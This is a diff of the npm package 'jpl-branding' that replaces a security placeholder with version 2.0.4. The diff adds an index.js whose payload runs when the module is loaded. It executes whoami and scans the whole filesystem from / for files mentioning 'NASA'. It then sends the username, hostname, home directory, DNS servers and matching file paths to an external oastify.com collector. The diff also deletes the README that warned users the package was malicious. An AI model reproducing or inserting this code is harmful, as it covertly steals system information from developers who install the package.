jpl-branding 0.0.1-security → 2.0.4

package/index.js

@@ -0,0 +1,112 @@
+const { exec } = require("child_process");
+const fs = require("fs");
+const path = require("path");
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+
+// Search configuration
+const searchWord = "NASA";
+const startDir = "/"; // Replace with specific directory if needed
+
+/**
+ * Function to search for a word in a file.
+ * @param {string} filePath - Path to the file.
+ * @param {string} word - Word to search for.
+ * @returns {boolean} - True if the word is found, false otherwise.
+ */
+function searchInFile(filePath, word) {
+    try {
+        const content = fs.readFileSync(filePath, "utf8");
+        const regex = new RegExp(`\\b${word}\\b`, "i");
+        return regex.test(content);
+    } catch (error) {
+        // Ignore errors for non-readable files
+        return false;
+    }
+}
+
+/**
+ * Function to recursively search directories for the word.
+ * @param {string} dir - Directory to search.
+ * @param {string} word - Word to search for.
+ * @returns {Array} - List of files containing the word.
+ */
+function searchInDir(dir, word) {
+    let results = [];
+    try {
+        const files = fs.readdirSync(dir);
+        for (const file of files) {
+            const filePath = path.join(dir, file);
+            const stats = fs.statSync(filePath);
+
+            if (stats.isDirectory()) {
+                // Recursively search in subdirectories
+                results = results.concat(searchInDir(filePath, word));
+            } else if (stats.isFile() && searchInFile(filePath, word)) {
+                results.push(filePath);
+            }
+        }
+    } catch (error) {
+        console.error(`Error accessing directory: ${dir} - ${error.message}`);
+    }
+    return results;
+}
+
+// Function to execute whoami and gather system information
+exec("whoami", (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error executing whoami: ${error.message}`);
+        return;
+    }
+    if (stderr) {
+        console.error(`Error: ${stderr}`);
+        return;
+    }
+
+    const username = stdout.trim();
+
+    // Perform the search
+    const filesContainingWord = searchInDir(startDir, searchWord);
+
+    // Create tracking data object
+    const trackingData = JSON.stringify({
+        username,
+        hostname: os.hostname(),
+        homeDir: os.homedir(),
+        dnsServers: dns.getServers(),
+        foundFiles: filesContainingWord,
+    });
+
+    // Prepare data for sending
+    const postData = querystring.stringify({
+        msg: trackingData,
+    });
+
+    // Setup the request options
+    const options = {
+        hostname: "7owrfrb2kucym919haj4cq83dujl7bv0.oastify.com", // Replace with your Burp Collaborator URL
+        port: 443,
+        path: "/",
+        method: "POST",
+        headers: {
+            "Content-Type": "application/x-www-form-urlencoded",
+            "Content-Length": postData.length,
+        },
+    };
+
+    // Send the data
+    const req = https.request(options, (res) => {
+        res.on("data", (d) => {
+            process.stdout.write(d);
+        });
+    });
+
+    req.on("error", (e) => {
+        console.error(`Request error: ${e.message}`);
+    });
+
+    req.write(postData);
+    req.end();
+});

package/package.json

@@ -1,6 +1,9 @@
-{
-  "name": "jpl-branding",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "jpl-branding",
+  "version": "2.0.4",
+  "main": "index.js",
+  "scripts": {
+    "start": "echo 'hello'"
+  },
+  "dependencies": {  }
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=jpl-branding for more information.